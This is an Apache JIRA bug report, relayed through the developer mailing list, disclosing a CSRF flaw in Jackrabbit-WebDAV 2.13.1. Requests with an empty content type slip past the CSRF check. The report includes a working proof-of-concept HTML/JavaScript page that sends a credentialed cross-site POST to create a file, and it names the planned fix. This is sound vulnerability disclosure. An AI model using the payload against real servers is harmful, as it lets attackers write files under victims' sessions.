You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@jackrabbit.apache.org by "Dominique Jäggi (JIRA)" <ji...@apache.org> on 2016/08/12 12:03:20 UTC

[jira] [Created] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

Dominique Jäggi created JCR-4002:
------------------------------------

             Summary: CSRF in Jackrabbit-Webdav using empty content-type
                 Key: JCR-4002
                 URL: https://issues.apache.org/jira/browse/JCR-4002
             Project: Jackrabbit Content Repository
          Issue Type: Bug
          Components: jackrabbit-webdav
    Affects Versions: 2.13.1
            Reporter: Dominique Jäggi
            Assignee: Dominique Jäggi
             Fix For: 2.13.2


As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:

{code}
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
        xhr.withCredentials = true;
        var body = "This file has been uploaded via CSRF.=\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
{code}

I will mitigate this particular issue by including a null content type in the list of rejected content types.

[0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)